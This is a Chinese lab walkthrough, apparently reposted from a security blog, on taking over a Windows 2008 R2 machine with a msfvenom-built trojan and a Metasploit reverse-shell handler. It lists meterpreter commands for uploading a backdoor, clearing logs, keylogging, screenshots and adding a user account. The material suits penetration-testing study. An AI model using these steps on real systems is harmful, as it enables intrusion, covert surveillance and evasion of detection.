MSF入侵Windows之实战

释放双眼,带上耳机,听听看~!

原理:

  利用msf模块中的msfvenom模块,生成123.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

准备:

  靶机:windows 2008 r2  

  ip:192.168.100.20

  攻击主机:kali         

  ip:192.168.100.21

实战:

1、     查看攻击主机ip

2、     生成123.exe木马文件

3、     将制作好的木马文件放到目标机内

4、     启动msfconsole进入msf

5、     加载exploit/multi/handler,设置payload反弹,设置LHOS反弹地址

6、     show options查看所设置的内容

7、     设置好后,直接exploit,开始攻击,等待目标靶机中招

8、     当靶机中招后,获得反弹shell,渗透成功

9、     此时我们就可以对靶机进行操作了

10、     如果出现了乱码现象,这是编码的问题,在终端->修改编码->改成中文的GBK退出再次shell即可解决

11、     meterpreter下的部分命令总结:

getwd当前目录

dir查看所有文件

cat111.txt 查看文件111.txt内容

search-f cmd.exe (搜索名为123.exe文件所在目录)

upload/root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件

downloadc:\123txt /root 下载文件

clearev清除日志

getuid当前用户

ps 查看所用进程

sysinfo系统信息

keyscan_start开始键盘记录

keyscan_stop停止键盘记录

keyscan_dump查看结果

屏幕截图

screenshot

屏幕监控

runvnc

shell

获取shell,进入cmd

netuser 用户名 密码 /add 添加用户(jeff/Abc!23)

netuser 用户名 密码 更改用户密码(jeff/ABc!@3)

最后,本次实验仅是仅供实验,切勿用于实战,否则后果自负!

本文源自微信公众号:弥天安全实验室

人已赞赏
安全工具

HW之钓鱼学习

2019-10-18 16:55:08

安全工具

渗透测试之登陆页面

2019-10-18 16:55:14

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索